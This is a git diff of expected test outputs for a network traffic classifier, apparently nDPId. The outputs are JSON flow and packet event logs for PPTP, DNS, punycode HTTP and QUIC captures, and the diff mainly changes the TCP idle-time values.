-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1451895531183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1451895531183,"pkt":"AhoR+E9+0N+aZRdHCABFAAA0SqZAAEAGB\/nAqCsWv2U9AaGWBrt+ULaFdbYwOYAQchDmkwAAAQEICgAH\/CwLt6rx"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1451895531141,"flow_last_seen":1451895531183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1451895531183,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} -00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1451895531141,"flow_last_seen":1451895536574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1451895536574,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1451895531141,"flow_last_seen":1451895531141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1451895531141,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1451895531141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531141,"pkt":"AhoR+E9+0N+aZRdHCABFAAA8SqVAAEAGB\/LAqCsWv2U9AaGWBrt+ULaEAAAAAKACchAUeAAAAgQFtAQCCAoAB\/whAAAAAAEDAwo="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1451895531183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531183,"pkt":"0N+aZRdHAhoR+E9+CABFUAA8Q2pAAPwGUty\/ZT0BwKgrFga7oZZ1tjA4flC2haASD5Yd2AAAAgQFMgEBCAoLt6rxAAf8IQQCAAA="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1451895531183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1451895531183,"pkt":"AhoR+E9+0N+aZRdHCABFAAA0SqZAAEAGB\/nAqCsWv2U9AaGWBrt+ULaFdbYwOYAQchDmkwAAAQEICgAH\/CwLt6rx"} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1451895531141,"flow_last_seen":1451895531183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1451895531183,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} 
+00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1451895531141,"flow_last_seen":1451895536574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1451895536574,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-data-len":740,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1451895536574} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 diff --git a/test/results/punycode-idn.pcap.out b/test/results/punycode-idn.pcap.out index 5f90935cf..678bd87c3 100644 --- a/test/results/punycode-idn.pcap.out +++ b/test/results/punycode-idn.pcap.out 
@@ -10,14 +10,14 @@ 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953695,"flow_last_seen":1643874953695,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953695,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643874953696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1643874953696,"pkt":"mAGnpQyTBBjWBrNaCABFAABDB3RAAEARrVjAqAIBwKgCjAA16vwALwOG+wWBgwABAAAAAAAAA3d3dw14bi0tbW5pY2gta3ZhA2NvbQAAAQAB"} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953696,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"www.xn--mnich-kva.com","num_queries":1,"num_answers":0,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874961730,"flow_last_seen":1643874961730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643874961730,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643874961730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961730,"pkt":"BBjWBrNamAGnpQyTCABFAABAAABAAEAGw3zAqAKMqiEJ5trLAFCDcwnXAAAAALAC\/\/\/UoQAAAgQFtAEDAwYBAQgKl2brUQAAAAAEAgAA"} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643874961751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961751,"pkt":"mAGnpQyTBBjWBrNaCABFAABAAABAADMG0HyqIQnmwKgCjABQ2svsD6nIg3MJ2LASFoCwBAAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} 
-00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643874961751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1643874961751,"pkt":"BBjWBrNamAGnpQyTCABFAAAoAABAAEAGw5TAqAKMqiEJ5trLAFCDcwnY7A+pyVAQ\/\/86WAAA"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1643874961730,"flow_last_seen":1643874961751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1643874961751,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.love.xn--55qx5d","url":"www.love.xn--55qx5d\/","code":0,"content_type":"","user_agent":"curl\/7.77.0"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874961730,"flow_last_seen":1643874961730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643874961730,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643874961730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961730,"pkt":"BBjWBrNamAGnpQyTCABFAABAAABAAEAGw3zAqAKMqiEJ5trLAFCDcwnXAAAAALAC\/\/\/UoQAAAgQFtAEDAwYBAQgKl2brUQAAAAAEAgAA"} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643874961751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961751,"pkt":"mAGnpQyTBBjWBrNaCABFAABAAABAADMG0HyqIQnmwKgCjABQ2svsD6nIg3MJ2LASFoCwBAAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643874961751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1643874961751,"pkt":"BBjWBrNamAGnpQyTCABFAAAoAABAAEAGw5TAqAKMqiEJ5trLAFCDcwnY7A+pyVAQ\/\/86WAAA"} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1643874961730,"flow_last_seen":1643874961751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1643874961751,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.love.xn--55qx5d","url":"www.love.xn--55qx5d\/","code":0,"content_type":"","user_agent":"curl\/7.77.0"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1643874961730,"flow_last_seen":1643874962305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1643874961730,"flow_last_seen":1643874962305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-data-len":1068,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1643874962305} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 16/16 diff --git a/test/results/quic-mvfst-22_decryption_error.pcap.out b/test/results/quic-mvfst-22_decryption_error.pcap.out index 84cb3375d..66337668f 100644 --- a/test/results/quic-mvfst-22_decryption_error.pcap.out +++ b/test/results/quic-mvfst-22_decryption_error.pcap.out 
@@ -1,724 +1,24 @@ 00481{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593498296832} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296832} 
-01981{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1260,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1260,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgE7B0GAABAEeVBCuYoqF5h4ZLy9AG7BNgTGcP6zrABCEACR1YBz3h7AABEvkgDSkdXT8KDRtZ6SuR9aklyes\/l4Sioa5nXAcPGveAb5Mb0k7uBERsrnzBa9uno+scwKQJ+8HaE7SwNRWaJ0B+VYq5sgzaHE9BksItfZB05b19PkWz3XaOJPeabOxbegkEde\/7BgQc2iMQiMZifq3YQkFbpelKpfZ8UxZbKFKO8T8enNpDFvm79StOLsc58r6VUI7R7RX2Dh+7UvHc8w55LVS4nFdKyvt+gLMAzuTrAqSRX04ucEX43SZLKcpJ+X+iK\/v9u1yLmGT\/8hHS\/A3VBUuWVRkAqUr3zRxflhV5CjsXky9idxKWm4C9Pn6cw4624LuYteYIUWOTHQHv3zV5\/rnXQxed5aHO337llijw0yLFxpnpOUEtoxTKtZZeNyR3\/hCIkY3n14k3gHfYXZl5t7DMoJYBnIHHhmdFCOK4sdCcKtpOlPKhDiv0BdCMImPxwr5CZ3d0NvKvNFKbylEYXGyw6diXHrADpP1Bpo7IsDo6OECekYHLzamw7fo5GRjTg4wyZ585sRHNOY5UQ14urjp6qTgyJaK+bJQKQXSG\/jPsJRoA3bT9RYwhd92VXr\/SRpMsMI1dgiAabVuN6aapjwqQ05GcX1xWXUOswELHBWeda+RZSG0ealfCxTmgk\/LmTIARNNTXtxke0sf\/IlfnV3ikcr9NqDIrI6of1G3cZfUQGBWE6gBVL5hH\/8pDG4T4ZpNiYz4Y0kEK9VRD1GZ0w6BCqlt\/kg2zd6ahgaI4n0T7BllqMO01YZ1t9pyXJShYy7a1\/GE3TCKsHNgIVU+OzGaBubO2O8foCsTRqluuqUPhG3n2E8MHmbHfrbqadkpRwbm5mHSUiRHvHPOMZ3uD3xF6j764aqPOQrl01dj1iQP+qGIcEY5l4ogPeALtV3hU5f7bpvLSDPKVoHsWvz++bxVzr7sgAnGREUzsxKt4SUYuRzz53icFmvd9rxNmgOaF+PEw\/dQIcNJqpxX8ulzLr4tUIjHsZy8Y3w0WHWlRvXX5BFt\/FNL6D1z9p+LMmNXuSPqVvh56LVqzeEf7uD4SQyYHHodFZUSZh4UJZfGLFC0eeFNy2qBWMNwCptrLdwN5PCZlQ07ewM1OmYFXib\/9zYOSk4B0N24Ml1I3V+BUt9Q\/f7In0Lo1bYVhzoFFJnm1wIhEDEaXvsKWXwZTHPIpl1Hz1I\/6Yq3hsX1N3dtM00S1An2mdoc9+06efV9TeSDkQwX8r+ZabNOKTRtHqXDe1Wl+aE\/ZahNHsuY3HnDuGINcHsBCTv1ovOmoDAi0RUdYM0lPaGHSMu61RpKW5cRQ0Cdy0+WZXfm0NBcMkEOs1K83zDl3Ni0ybs6vWiqa45kxw7H1vC362nLorQvhZdy7wTrE4RWiFGT0Xccp4Rl8QprALjpWqFcS7MPnifCUJZzLuwLuogz6ePAO7YscFlIza4b2sSjihSJrD9QLuOyhifjzSEn4amVk5ivqXVE+QZ1R7NVlYJU0wlh1SwakKVblsHRVpjkjVrp5to9V854cET1W0se7gIi2a7oXoLvW8CT8NdthxNrd\/AUaazo7KSGS96THBAG+HmraPSIMT5EEnSDc\/KXc1EWvMFe0xKOugeQC4v6tFGa5dLsgNI0TE"} 
-00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgAapbBAABAEXAICuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":5,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -01222{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":698,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":698,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACurDPAABAEVPiCuYoqF5h4ZLy9AG7AqZJuU5AAkdWAc94e8TV08o58cInQhPfXEiH4R0yyR9AqFdJP97dW9QPxH5QALs4W48u\/A\/lmN+Z1gHpoOM1PLHjFfJbJb+kTSEeMOTQm72wgJFh+SbVesiWwZpXw+U97IhYBLP3WiFpBRQqDumQUeDiPkGwyTmNP9TNRpuF5QXHv1kPwiigyC2fJbgUUnl9e+zGQ79Cz8Bs\/eLwhmD1t2VJ7Cd7RuwKu2Fjort3XX4whsN7E7gB18XviaUhr5XnESzxgkyjbQ2IfYB1sJV2o4NiOWtS1g6oecOKw+P0SfmOdI8cA9W3q6oJEd81gYI3RSx3xGFnp9Oqu5Hc1vqbqNObKzndCPUi\/ewslI8ItQbC0BI4e50MqqScJSR\/5Vl6GG0TgIA0bMt3EG4lRLe0LXPxOgts4PbF21wxQKa7Tv1beWim5pfI+OGmD3DMiWSvIdPZw4l\/5hMQFemEjraWnBk1V\/\/OrAI2iv\/RsuB4yz9sORUhXLWck60hCb1uyIqNiRD+xW3bPH7r3P6z4UKMSlVVvqUDaRMdKibqynDHOOAWSj7+sP8Bf90ZLULJRyJUvi97ONtn16Gv8dO0\/jgeS3zlXeoqRUMEdvWBCLl6ExIUXPrzQxsNhsLrDhpW\/tDjV8bVc6b9OLSI4orbGjrxJjgcK689zWXeFHPekaWBT4LUjVMZvHiddSwc8CEIhbTIYZZ\/KM3XZ3ulglZV9+vPGct4VamjTqRcgHkoqQdwsrno2odIMs10yxJGOEmQN8Cw6E4hVNmBXDs81Q+k7pqJy1KFzOnCXOnG+YjtFuf9t7vMgoxn\/Mbid1XY3cSPVo6pJwkgIo3JrJMF3FGhAG1utFi6vz1QEXDtf6Aad0WCniKSed4SL+b04FPKN0pE40Yv1Qo="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":6,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} 
